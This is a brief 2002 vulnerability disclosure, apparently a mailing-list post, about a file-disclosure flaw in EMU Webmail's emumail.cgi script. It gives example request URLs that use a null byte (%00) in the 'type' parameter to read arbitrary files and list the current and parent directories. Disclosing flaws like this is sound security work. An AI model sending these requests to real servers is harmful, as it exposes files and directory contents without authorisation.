>name : emumail.cgi >date : 04/04/2002 >description : EMU Webmail: how to check your email >from the web. >severity : Low/average-risk >homepage : www.emumail.com > >Any user can view files on the remote system: >xxx/PATH/emumail.cgi?type=FILE%00 > > > >The vendor were contact about that > http://site/emumail.cgi?type=.%00 Seems to give the directory index of the current directory. http://site/emumail.cgi?type=..%00 Seems to give the directory index of ../ -- N|ghtHawk http://www.hackers4hackers.org
